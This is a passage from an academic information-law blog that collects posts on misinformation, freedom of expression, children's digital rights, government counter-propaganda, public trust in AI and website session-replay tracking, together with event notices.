To this end, perhaps the new Lord Chancellor and Secretary of State for Justice, David Gauke MP, and the new Secretary of State for Digital, Culture, Media and Sport, Matt Hancock MP, might consider ways in which they can consult more openly and fairly in their development of policy and draft legislation on freedom of expression, reputation and privacy.

Dr Judith Townend is lecturer in media and information law at the University of Sussex and a member of the Queen’s Bench Division Media and Communications List User Group Committee.

Featured image: courtesy of Dave Pearce (@davebass5) on Flickr.

LSE Experts on T3: Omar Al-Ghazzi

Mon, 09/04/2018 - 10:47

This post is re-posted from the LSE Media Policy Project Blog.

As part of a series of interviews with LSE Faculty on themes related to the Truth, Trust and Technology Commission, Dr Omar Al-Ghazzi  talks to LSE MSc student Ariel Riera on ‘echo chambers’ in the context of North Africa and the Middle East.

AR: The spread of misinformation through social media is a main focus of the Commission. Are there similar processes in the Middle East and in the North Africa region?

OA: Questions about trust, divisions within society, and authoritarian use of information or what could be called propaganda are very prevalent in the Middle East and North Africa. So in a way a lot of the issues at hand are not really new if we think about communication processes globally. Much of the attention that misinformation has been getting is in relation to Trump and Brexit. But Syria, for instance, is actually a very productive context to think through these questions, because with the uprising and the war, there was basically an information blackout where no independent journalist could go into the country. This created an environment where witnesses and citizen journalists and activists fill that gap. So it is now a cliché to say that the war in Syria is actually the most documented war. But all that information has not led to a narrative that people understand in relation to what’s happening. And that has to do with trust in digital media and the kind of narratives that the government disseminates. The echo chamber effect in the way people access information from online sources they agree with is also as prevalent in the Middle East as it is globally.

AR: And in these countries, who are the perpetrators of fake news and misinformation and what are the channels?

OA: It is a complicated question because if we talk about the war in Syria, the communication environment is much more complex than the binary division between fake and real. For instance, I am interested in the reporting on the ground in areas that are seeing or witnessing war and conflict. I will give you an example. Now in the suburbs of Damascus, where there is a battle between rebels and the government, there are several cases of children and teenagers doing the reporting. So how should this be picked up by news organisations, and what are the consequences? CNN recently called one of the teenagers based in Eastern Ghouta, Muhammed Najem, a ‘combat reporter’. What are the ethical considerations of that? Does that encourage that teenager to take for instance more risks to get to that footage? How is what he produces objective if first he has obviously no journalism training as a very young person and second he is in a very violent context where his obvious interest lies in his own survival and in getting attention about his and his community’s suffering. He has a voice that he wants to be heard and which should be heard. But why is the expectation, if he is dubbed a ‘combat report’, that what he produces should be objective news reporting?

Beyond this example of the complex picture in war reporting, I think the Middle East region also teaches us that when there is a lack of trust in institutions of any country in the world, when there is division in society about a national sense of belonging, about what it means to be a patriot or a traitor, that would produce mistrust in the media. Basically, a fractured political environment engenders lack of trust in media, and engenders that debate around fake or real. So there is a layer beyond the fakeness and realness that’s really about social cohesion and political identity.

AR: Nationalist politicians all over the world have found in social media a way to bypass mainstream media and appeal directly to voters. What techniques do they use to do this?

OA: Perhaps in the Middle East you don’t find an example of a stream of consciousness relayed live on Twitter like the case is with President Trump, but, like elsewhere in the world, politicians are on Twitter and even foreign policy is often communicated there. Also, a lot of narratives that feed into conflicts, like the Arab-Israeli conflict, take shape on social media. So without looking at social media you certainly don’t get the full picture even of the geopolitics in the region. Without social media, one would not grasp how government positions get internalised by people and how people contribute- whether by feeding into government policies, or maybe resisting them as well.

AR: Based on your observations in North Africa and the Middle East, can mistrust or even distrust of mainstream media outlets be a healthy instinct? For example, if mainstream media is a place where only one voice is heard.

OA: Even though a lot of the media are politicised in the Arab world because they are government owned, people have access to media other than their own governments because of a common regional cultural affiliation, a shared language and the nature of the regional media environment. So actually people in the Arab world are sophisticated media users because they have access to a wide array of media outlets. Of course, there are outlets that are controlled by governments wherever one may be situated and things vary between different countries, but audiences can access pan-Arab news media such as Al Jazeera, Al Arabiya and Al Mayadeen. They have access to a wide array of online news platforms as well as broadcast news. So you really have a lot of choices. If you are a very informed audience member you would watch one news outlet to know, let’s say, what the Iranian position on a certain event is, and then you watch a Saudi funded channel to see the Saudi. But of course, most people don’t do that because you know they just access the media that offers the perspective they already agree with.

We have to remember that in the context of the Middle East there is a lot of different conflicts, there is war, which obviously heightens the emotions of people and their allegiances and whatever their worldview is. So we are also talking about the context that, because of what is happening on the ground, people feel strongly about their political positioning which feeds into the echo chamber effect.

AR: You wrote that, at least linked to the Arab Spring, there was a ‘diversity of acts referred to as citizen journalism’. What differentiates these practices from the journalism within established media?

OA: Basically, in relation to the 2011 Arab uprisings, there were a lot of academic and journalistic approaches that talked about how these uprisings were Facebook or Twitter revolutions, or only theorising digital media practices through the lens of citizen journalism. But I argued that we cannot privilege one lens to look at what digital media does on the political level because a lot of people use digital media, from terrorist organisations to activists on the ground to government agents. So one cannot privilege a particular use of digital media and focus on that and make claims about digital media generally, when actually the picture is much more complicated and needs to be sorted out more.

Of course the proliferation of smartphones and social media offered ordinary people the opportunity to have their own output, to produce witness videos or write opinions. It is a very different media ecology because of that. However, we cannot take for granted how social media is used by different actors. In social science we have to think about issues of class, literacy, the urban rural divide, the political system, the media system. And, within that complexity, locate particular practices of social media rather than make blanket statements about social media doing something to politics generally and universally.

Dr Omar Al-Ghazzi is Assistant Professor in the Department of Media and Communications at LSE. He completed his PhD at the Annenberg School for Communication, the University of Pennsylvania, and holds MAs in Communication from the University of Pennsylvania and American University and a BA in Communication Arts from the Lebanese American University.

 

 

Recent developments on freedom of expression, Dr David Goldberg

Fri, 16/03/2018 - 10:23

This post brings us some recent developments on freedom expression from Dr David Goldberg, Senior Visiting Fellow, Institute of Computer and Communications Law in the Centre for Commercial Law Studies, Queen Mary, University of London, and member of the Information Law and Policy Centre’s Advisory Board.

Dr Goldberg has recently co-organised a symposium at the Southwestern Law School, Los Angeles, on “Fake News and Weaponized Defamation”. The event took place on the 26th January 2018. Further information on the event can be found at: https://www.swlaw.edu/curriculum/honors-programs/law-review-journals/journal-international-media-entertainment-law/global. Photos from the event are available at https://flic.kr/s/aHsmfxk8dL.

Dr Goldberg delivered a presentation at the event calling for enhancing media literacy, and cautioning against over-relying on the law to deal with the so-called phenomenon of fake news. Dr Goldberg’s presentation will be available in a forthcoming publication.

In addition, Dr Goldberg has recently published a chapter entitled ‘Dronalism, Newsgathering Protection and Day-to-day Norms’ in Responsible Drone Journalism (2018) edited by Astrid Gynnild and Turo Uskali. The book is available at https://www.crcpress.com/Responsible-Drone-Journalism/Gynnild-Uskali/p/book/9781138059351.

Lastly, following up on the ‘Freedom of Information at 250’ event held at the Free Word Centre in December 2016 with the support of the Information Law and Policy Centre at the Institute of Advanced Legal Studies, and the Embassies of Sweden and Finland, the publication Press Freedom 250 Years: Freedom of the Press and Public Access to Official Documents in Sweden and Finland – A Living Heritage from 1766 is now available in English. The publication of this translation has been in large part due to the efforts of Dr David Goldberg, Mark Weiler and Staffan Dalhoff. The book was launched on 2nd December 2016 at the Swedish Parliament, and the free PDF is available at http://www.riksdagen.se/globalassets/15.-bestall-och-ladda-ned/andra-sprak/tf-250-ar-eng-2018.pdf.

To order the book for libraries, contact:
Riksdag Printing Office, SE 100 12 Stockholm
E-mail: ordermottagningen@riksdagen.se

ILPC Annual Conference and Annual Lecture 2017 Children and Digital Rights: Regulating Freedoms and Safeguards

Tue, 13/03/2018 - 17:07

ILPC Annual Conference and Annual Lecture 2017
Children and Digital Rights: Regulating Freedoms and Safeguards

The Internet provides children with more freedom to communicate, learn, create, share, and engage with society than ever before. Research by Ofcom in 2016 found that 72 percent of young teenagers in the UK have social media accounts. Twenty percent of the same group have made their own digital music and 30 percent have used the Internet for civic engagement by signing online petitions or by sharing and talking about the news.

Interacting within this connected digital world, however, also presents a number of challenges to ensuring the adequate protection of a child’s rights to privacy, freedom of expression, and safety, both online and offline. These risks range from children being unable to identify advertisements on search engines to being subjects of bullying or grooming or other types of abuse in online chat groups.

Children may also be targeted via social media platforms with methods (such as fake online identities or manipulated photos and images) specially designed to harm them or exploit their particular vulnerabilities and naivety.

These issues were the focus of the 2017 Annual Conference of the Information Law and Policy Centre (ILPC) based at the Institute of Advanced Legal Studies, University of London. The ILPC produces, promotes, and facilitates research about the law and policy of information and data, and the ways in which law both restricts and enables the sharing and dissemination of different types of information.

The ILPC’s Annual conference was one of a series of events celebrating
the 70th Anniversary of the founding of the Institute of Advanced Legal Studies. Other events included the ILPC’s Being Human Festival expert and interdisciplinary panel discussion on ‘Co-existing with HAL 9000: Being Human in a World with Artificial Intelligence’.

At the 2017 ILPC Annual Conference, leading policymakers, practitioners, regulators, key representatives from industry and civil society, and academic experts examined and debated the opportunities and challenges posed by current and future legal frameworks and the policies being used and developed to safeguard these freedoms and rights.

These leading stakeholders included Rachel Bishop, Deputy Director of Internet Policy at the Department of Digital (DCMS); Lisa Atkinson, the Information Commissioner’s Office (ICO) Head of Policy; Anna Morgan, Deputy Data Protection Commissioner of Ireland; Graham Smith, Internet law expert at Bird & Bird LLP), Renate Samson, former CEO of privacy advocacy organisation Big Brother Watch, and Simon Milner, Facebook’s Policy Director for the UK, Africa, and Middle East.

The legal systems under scrutiny included the UN Convention on the Rights of the Child and the related provisions of the UK Digital Charter, and the UK Data Protection Bill, which will implement the major reforms of the much anticipated EU General Data Protection Regulation (2016/679) (GDPR) which will soon enter into force on 25 May 2018. Key concerns expressed at the conference by delegates included the effectiveness in practice and lack of evidence-based policy for the controversial age of consent for children and their use of online information services provided for under the GDPR.

Further questions were raised with respect to what impact in practice will there be for children’s privacy, their freedom of expression, and their civil liberties as a result of the new transparency and accountability principles and mechanisms that must be implemented by industry and governments when their data processing involves the online marketing to, or monitoring, of children.

Given the importance and pertinence of these challenging and cutting-edge policy issues, the Centre is delighted that several papers, by regulators and academic experts from institutions within the UK, the EU, and beyond, which were presented, discussed, and debated at the conference’s plenary sessions and keynote panels, feature in a special issue of the leading peer-review legal journal of Communications Law, published by Bloomsbury Publishers.

This special issue also includes the Centre’s 2017 Annual Lecture delivered by one of the country’s leading children’s online rights campaigners, Baroness Beeban Kidron OBE, also a member of the House of Lords and film-maker, on ‘Are Children more than Clickbait in the 21st Century?’

For IALS podcasts of the 2017 ILPC Annual Lecture delivered by Baroness Kidron and presentations from the Annual Conference’s Keynote Panel, please see the IALS website at: http://ials.sas.ac.uk/digital/videos.

Nora Ni Loideain
Director and Lecturer in Law,
Information Law and Policy Centre,
IALS, University of London.

5th Winchester Conference on Trust, Risk, Information and the Law Wednesday 25 April 2018, Winchester, UK

Mon, 12/03/2018 - 11:37

5th Winchester Conference on Trust, Risk, Information and the Law Wednesday 25 April 2018, Holiday Inn, Winchester, UK

Theme: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?

Keynote speakers will be Michael Barton, Chief Constable of Durham Constabulary who has spoken recently about the need to reclaim ‘sovereignty’ over the Internet, and Jamie Bartlett, Director of the Centre for the Analysis of Social Media for Demos in conjunction with the University of Sussex, and author of several books including ‘Radicals’ and ‘The Dark Net’.  Breakout sessions will explore fake news, the use of algorithms in the public sector, infringements over the Internet and other issues.  The conference will include the launch of the University of Winchester’s new Centre for Parliament and Public Law, with a presentation highlighting the ongoing work of the Department of Culture, Media & Sport in the area of Data Ethics & Innovation.

 

For the full conference programme, please visit https://www.winchester.ac.uk/news-and-events/events/event-items/the-5th-winchester-conference-on-trust-risk-information-and-the-law-trilcon18.php

 

To book, please go to https://store.winchester.ac.uk/conferences-and-events/academic-conferences/faculty-of-business-law-sport/winchester-conference-on-trust-risk-information-and-the-law-2018

British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand

Tue, 06/02/2018 - 13:44
 

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploit the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

 

Parliament’s Digital, Culture, Media and Sport Committee is currently investigating the use of fake news – the spreading of stories of “uncertain provenance or accuracy” – through social media and other channels. The investigation is taking place amid claims that Russia used hundreds of fake accounts to tweet about Brexit. The head of the army, General Sir Nick Carter, recently told the think-tank RUSI that Britain should be prepared to fight an increasingly assertive Russia.

Details of the new anti-fake news unit are vague, but may mark a return to Britain’s Cold War past and the work of the Foreign Office’s Information Research Department (IRD), which was set up in 1948 to counter Soviet propaganda. The unit was the brainchild of Christopher Mayhew, Labour MP and under-secretary in the Foreign Office, and grew to become one of largest Foreign Office departments before its disbandment in 1977 – a story revealed in The Guardian in January 1978 by its investigative reporter David Leigh.

This secretive government body worked with politicians, journalists and foreign governments to counter Soviet lies, through unattributable “grey” propaganda and confidential briefings on “Communist themes”. IRD eventually expanded from this narrow anti-Soviet remit to protect British interests where they were likely “to be the object of hostile threats”.



Read more:
Good luck banning fake news – here’s why it’s unlikely to happen

By 1949, IRD had a staff of just 52, all based in central London. By 1965 it employed 390 staff, including 48 overseas, with a budget of over £1m mostly paid from the “secret vote” used to fund the UK intelligence community. IRD also worked alongside the Secret Intelligence Service (SIS or MI6) and the BBC’s World Service.

Playing hardball with soft power

Examples of IRD’s early work include reports on Soviet gulags and the promotion of anti-communist literature. George Orwell’s work was actively promoted by the unit. Shortly before his death in 1950, Orwell even gave it a list of left-wing writers and journalists “who should not be trusted” to spread IRD’s message. During that decade, the department even moved into British domestic politics by setting up a “home desk” to counter communism in industry.

 

IRD also played an important role in undermining Indonesia’s President Sukarno in the 1960s, as well as supporting western NGOs – especially the Thomson and Ford Foundations. In 1996, former IRD official Norman Reddaway provided more information on IRD’s “long-term” campaigns (contained in private papers). These included “English by TV” broadcast to the Gulf, Sudan, Ethiopia and China, with other IRD-backed BBC initiatives – “Follow Me” and “Follow Me to Science” – which had an estimated audience of 100m in China.

IRD was even involved in supporting Britain’s entry to the European Economic Community, promoting the UK’s interests in Europe and backing politicians on both sides. It would shape the debate by writing a letter or article a day in the quality press. The department was also involved in more controversial campaigns, spreading anti-IRA propaganda during The Troubles in Northern Ireland, supporting Britain’s control of Gibraltar and countering the “Black Power” movement in the Caribbean.

Overthrown: President Sukarno of Indonesia. Going too far

IRD’s activities were steadily getting out of hand, yet an internal 1971 review found the department was still needed, given “the primary threat to British and Western interests worldwide remains that from Soviet Communism” and the “violent revolutionaries of the ‘New Left’”. IRD was a “flexible auxiliary, specialising in influencing opinion”, yet its days were numbered. By 1972 the organisation had just over 100 staff and faced significant budget cuts, despite attempts at reform.

IRD was eventually killed off thanks to opposition from Foreign Office mandarins and the then Labour foreign secretary, David Owen – though that may not be the end of the story. Officials soon set up the Overseas Information Department – likely a play on IRD’s name – tasked with making “attributable and non-attributable” written guidance for journalists and politicians, though its overall role is unclear. Information work was also carried out by “alongsiders” such as the former IRD official Brian Crozier.

The history of IRD’s work is important to future debates on government strategy in countering “fake news”. The unit’s effectiveness is certainly open to debate. In many cases, IRD’s work reinforced the anti-Soviet views of some, while doing little, if anything, to influence general opinion.

In 1976, one Foreign Office official even admitted that IRD’s work could do “more harm than good to institutionalise our opposition” and was “very expensive in manpower and is practically impossible to evaluate in cost effectiveness” – a point worth considering today.

IRD’s rapid expansion from anti-communist unit to protecting Britain’s interests across the globe also shows that it’s hard to manage information campaigns. What may start out as a unit to counter “fake news” could easily spiral out of control, especially given the rapidly expanding online battlefield.

Government penny pinching on defence – a key issue in current debates – could also fail to match the resources at the disposal of the Russian state. In short, the lessons of IRD show that information work is not a quick fix. The British government could learn a lot by visiting the past.

This article was originally published on The Conversation. Read the original article.

Annual Conference 2017 Resources

Tue, 06/02/2018 - 12:16

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, and the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Co-existing with HAL 9000: Being Human in a World with AI

Tue, 23/01/2018 - 11:53

This event will focus on the implications posed by the increasingly significant role of artificial intelligence (AI) in society and the possible ways in which humans will co-exist with AI in future, particularly the impact that this interaction will have on our liberty, privacy, and agency. Will the benefits of AI only be achieved at the expense of these human rights and values? Do current laws, ethics, or technologies offer any guidance with respect to how we should navigate this future society?

Organisations: Institute of Advanced Legal Studies Event date: Monday, 20 November 2017 – 5:30pm Visit the event page

Emotion detection, personalisation and autonomous decision-making online

Tue, 23/01/2018 - 11:18

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants: Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision making. Technological advancements are now rendering emotions detectable in real-time. Building on the granular insights provided by big data, such technological developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and the other consumer-facing interactions, based on personal preferences, biases and emotion insights gleaned from the tracking of online activity and profiling and the emergence of ‘emphathic media’.

Although emotion measurement is far from a new phenomenon, technological developments are increasing the capacity to monetise emotions. From the analysis of inter alia facial expressions, voice/sound patterns, to text and data mining, and the use of smart devices to detect emotions, such techniques are becoming mainstream.

Despite the fact there are many applications of such technologies which appear morally above reproach (i.e. at least in terms of their goals (e.g. healthcare or road safety) as opposed to the risks associated with their implementation, deployment and their potential effects), their use for advertising and marketing purposes raises clear concerns in terms of the rationality-based paradigm inherent to citizen-consumer protections and thus the autonomous decision-making capacity of individuals.

In this ILPC seminar, Visiting Scholar Damian Clifford will examine the emergence of such technologies in an online context vis-à-vis their use for commercial advertising and marketing purposes (construed broadly) and the challenges they present for EU data protection and consumer protection law. The analysis will rely on a descriptive and evaluative analysis of the relevant frameworks and aims to provide normative insights into the potential legal challenges presented by emotion commercialisation online.

Discussant:  Dr Edina Harbinja is a Senior Lecturer in Law at the University of Hertfordshire. Her principal areas of research and teaching are related to the legal issues surrounding the Internet and emerging technologies. In her research, Edina explores the application of property, contract law, intellectual property and privacy online. Edina is a pioneer and a recognised expert in post-mortem privacy, i.e. privacy of the deceased individuals. Her research has a policy and multidisciplinary focus and aims to explore different options of regulation of online behaviours and phenomena. She has been a visiting scholar and invited speaker to universities and conferences in the USA, Latin America and Europe, and has undertaken consultancy for the Fundamental Rights Agency. Her research has been cited by legislators, courts and policymakers in the US and Europe as well. Find her on Twitter at @EdinaRl.

A wine reception will follow this seminar.

This event is FREE but advanced booking is required.

Book now

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Wed, 17/01/2018 - 12:07

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy  Description of Presentation:  Despite the World Economic Forum (2011) report on personal data becoming an asset class  the cost of transacting on personal data is becoming increasingly high with regulatory risks, societal disapproval, legal complexity and privacy concerns.  Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or indeed, data in general. Hence, legal and economic structures have been created only around Organisation-controlled personal data (OPD).  This presentation will argue that a person-controlled personal data (PPD), technologically, legally and economically architected such that the individual owns a personal micro-server and therefore have full rights to the data within, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Key Speaker:

Professor Irene Ng, University of Warwick

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng is an advisor to large organisations, startups and governments on design of markets, economic and business models in the digital economy. Personal website http://ireneng.com

Panel Discussants:

TBC

Chair:

Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, IALS

 

Wine reception to follow.

 

People don’t trust AI – here’s how we can change that

Tue, 16/01/2018 - 12:54

In this guest post, Vyacheslav Polonski, Researcher, University of Oxford  examines the key question of trust or fear of AI and we interact with it.

Artificial intelligence can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Should you trust Dr. Robot?

IBM’s attempt to promote its supercomputer programme to cancer doctors (Watson for Onology) was a PR disaster. The AI promised to deliver top-quality recommendations on the treatment of 12 cancers that accounted for 80% of the world’s cases. As of today, over 14,000 patients worldwide have received advice based on its calculations.

But when doctors first interacted with Watson they found themselves in a rather difficult situation. On the one hand, if Watson provided guidance about a treatment that coincided with their own opinions, physicians did not see much value in Watson’s recommendations. The supercomputer was simply telling them what they already know, and these recommendations did not change the actual treatment. This may have given doctors some peace of mind, providing them with more confidence in their own decisions. But IBM has yet to provide evidence that Watson actually improves cancer survival rates.

On the other hand, if Watson generated a recommendation that contradicted the experts’ opinion, doctors would typically conclude that Watson wasn’t competent. And the machine wouldn’t be able to explain why its treatment was plausible because its machine learning algorithms were simply too complex to be fully understood by humans. Consequently, this has caused even more mistrust and disbelief, leading many doctors to ignore the seemingly outlandish AI recommendations and stick to their own expertise.

As a result, IBM Watson’s premier medical partner, the MD Anderson Cancer Center, recently announced it was dropping the programme. Similarly, a Danish hospital reportedly abandoned the AI programme after discovering that its cancer doctors disagreed with Watson in over two thirds of cases.

The problem with Watson for Oncology was that doctors simply didn’t trust it. Human trust is often based on our understanding of how other people think and having experience of their reliability. This helps create a psychological feeling of safety. AI, on the other hand, is still fairly new and unfamiliar to most people. It makes decisions using a complex system of analysis to identify potentially hidden patterns and weak signals from large amounts of data.

Even if it can be technically explained (and that’s not always the case), AI’s decision-making process is usually too difficult for most people to understand. And interacting with something we don’t understand can cause anxiety and make us feel like we’re losing control. Many people are also simply not familiar with many instances of AI actually working, because it often happens in the background.

Instead, they are acutely aware of instances where AI goes wrong: a Google algorithm that classifies people of colour as gorillas; a Microsoft chatbot that decides to become a white supremacist in less than a day; a Tesla car operating in autopilot mode that resulted in a fatal accident. These unfortunate examples have received a disproportionate amount of media attention, emphasising the message that we cannot rely on technology. Machine learning is not foolproof, in part because the humans who design it aren’t.

A new AI divide in society?

Feelings about AI also run deep. My colleagues and I recently ran an experiment where we asked people from a range of backgrounds to watch various sci-fi films about AI and then asked them questions about automation in everyday life. We found that, regardless of whether the film they watched depicted AI in a positive or negative light, simply watching a cinematic vision of our technological future polarised the participants’ attitudes. Optimists became more extreme in their enthusiasm for AI and sceptics became even more guarded.

This suggests people use relevant evidence about AI in a biased manner to support their existing attitudes, a deep-rooted human tendency known as confirmation bias. As AI is reported and represented more and more in the media, it could contribute to a deeply divided society, split between those who benefit from AI and those who reject it. More pertinently, refusing to accept the advantages offered by AI could place a large group of people at a serious disadvantage.

Three ways out of the AI trust crisis

Fortunately we already have some ideas about how to improve trust in AI. Simply having previous experience with AI can significantly improve people’s attitudes towards the technology, as we found in our study. Similar evidence also suggests the more you use other technologies such as the internet, the more you trust them.

Another solution may be to open the “black-box” of machine learning algorithms and be more transparent about how they work. Companies such as Google, Airbnb and Twitter already release transparency reports about government requests and surveillance disclosures. A similar practice for AI systems could help people have a better understanding of algorithmic decisions are made.

Research suggests involving people more in the AI decision-making process could also improve trust and allow the AI to learn from human experience. For example,one study showed people were given the freedom to slightly modify an algorithm felt more satisfied with its decisions, more likely to believe it was superior and more likely to use it in the future.

We don’t need to understand the intricate inner workings of AI systems, but if people are given at least a bit of information about and control over how they are implemented, they will be more open to accepting AI into their lives.

This article was originally published on The Conversation. Read the original article.

A Prediction about Predictions

Tue, 19/12/2017 - 11:33

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Humphrey, I want to do something about predictions.

Indeed, Minister.

Yes Humphrey, the machines are taking over.

Are they Minister?

Yes Humphrey, my advisers tell me I should be up in arms.  Machines – ‘AI’ they call it – predicting what I’m going to buy, when I’m going to die, even if I’ll commit a crime.

Surely not, Minister.

Not me personally, of course, Humphrey – other people.  And then there’s this scandal over Cambridge Analytica and voter profiling.  Has no-one heard of the secret ballot?

Everyone knows which way you would vote, Minister.

Yes, yes, not me personally, of course, Humphrey – other people.  Anyway, I want to do something about it.

Of course, Minister.  Let me see – you want to ban voter and customer profiling, crime risk assessment and predictions of one’s demise, so that would mean no more targeted advertising, political campaigning, predictive policing, early parole releases, life insurance policies…

Well, let’s not be too hasty Humphrey.  I didn’t say anything about banning things.

My sincere apologies Minister, I had understood you wanted to do something.

Yes, Humphrey, about the machines, the AI.  People don’t like the idea of some faceless computer snooping into their lives and making predictions about them.

But it’s alright if a human does it.

Yes…well no…I don’t know.  What do you suggest Humphrey?

As I see it Minister, you have two problems.

Do I?

The people are the ones with the votes, the AI developers are the ones with the money and the important clients – insurance companies, social media giants, dare I say it, even political parties..

Yes, yes, I see.  I mustn’t alienate the money.  But I must be seen to be doing something Humphrey.

I have two suggestions Minister.  First, everything must be ‘transparent’.  Organisations using AI must say how their technology works and what data it uses.  Information, information everywhere…

I like it Humphrey.  Power to the people and all that.  And if they’ve had the information, they can’t complain, eh.  And the second thing?

A Commission, Minister, or a Committee, with eminent members, debating, assessing, scrutinising, evaluating, appraising…

And what is this Commission to do?

“Do” Minister?

What will the Commission do about predictions and AI?

It will scrutinise, Minister, it will evaluate, appraise and assess, and then, in two or three years, it will report.

But what will it say Humphrey?

I cannot possibly predict what the Commission on Predictions would say, being a mere humble servant of the Crown.

Humphrey!

But if I had to guess, I think it highly likely that it will say that context reigns supreme – there are good predictions and there are bad predictions, and there is good AI and there is bad AI.

So after three years of talking, all it will say is that ‘it depends’.

Yes Minister.

In homage to ‘Yes Minister’ by Antony Jay and Jonathan Lynn 

Marion Oswald, Senior Fellow in Law, Head of the Centre for Information Rights, University of Winchester

The Fifth Interdisciplinary Winchester Conference on Trust, Risk, Information and the Law will be held on Wednesday 25 April 2018 at the Holiday Inn, Winchester UK.  Our overall theme for this conference will be: Public Law, Politics and the Constitution: A new battleground between the Law and Technology?  The call for papers and booking information can be found at https://journals.winchesteruniversitypress.org/index.php/jirpp/pages/view/TRIL

How websites watch your every move and ignore privacy settings

Thu, 30/11/2017 - 10:25

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

The research found that third party tracking services are used by hundreds of businesses to monitor how users navigate their websites. This is proving to be increasingly challenging as more and more companies beef-up security and shift their sites over to encrypted HTTPS pages.

To work around this, session-replay scripts are deployed to monitor user interface behaviour on websites as a sequence of time-stamped events, such as keyboard and mouse movements. Each of these events record additional parameters – indicating the keystrokes (for keyboard events) and screen coordinates (for mouse movement events) – at the time of interaction. When associated with the content of a website and web address, this recorded sequence of events can be exactly replayed by another browser that triggers the functions defined by the website.

What this means is that a third person is able to see, for example, a user entering a password into an online form – which is a clear privacy breach. Websites that employ third party analytics firms to record and replay such behaviour is, they argue, in the name of “enhancing user experience”. The more they know what their users are after, the easier it is to provide them with targeted information.

While it’s not news that companies are monitoring our behaviour as we surf the web, the fact that scripts are quietly being deployed to record individual browser sessions in this way has concerned the study’s co-author, Steven Englehardt, who is a PhD candidate at Princeton.

A website user replay demo in action.

“Collection of page content by third-party replay scripts may cause sensitive information, such as medical conditions, credit card details, and other personal information displayed on a page, to leak to the third-party as part of the recording,” he wrote. “This may expose users to identity theft, online scams and other unwanted behaviour. The same is true for the collection of user inputs during checkout and registration processes.”

Websites logging keystrokes has been an issue known for a while to cybersecurity experts. And Princeton’s empirical study raises valid concerns about users having little or no control over their surfing behaviour being recorded in this way.

So it’s important to help users control how their information is shared online. But there are increasing signs of usability trumping security measures that are designed to keep our data safe online.

Usability vs security

Password managers are used by millions of people to help them easily keep a record of different passwords for different sites. The user of such a service only needs to memorise one key password.

Recently, a group of researchers at the University of Derby and the Open University discovered that the offline clients of password manager services were at risk of exposing the main key password when stored as plain text in memory that could be sniffed or dumped by whole system attacks.

User experience is not an excuse for tolerating security flaws.

This article was originally published on The Conversation. Read the original article.

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

Tue, 28/11/2017 - 11:01

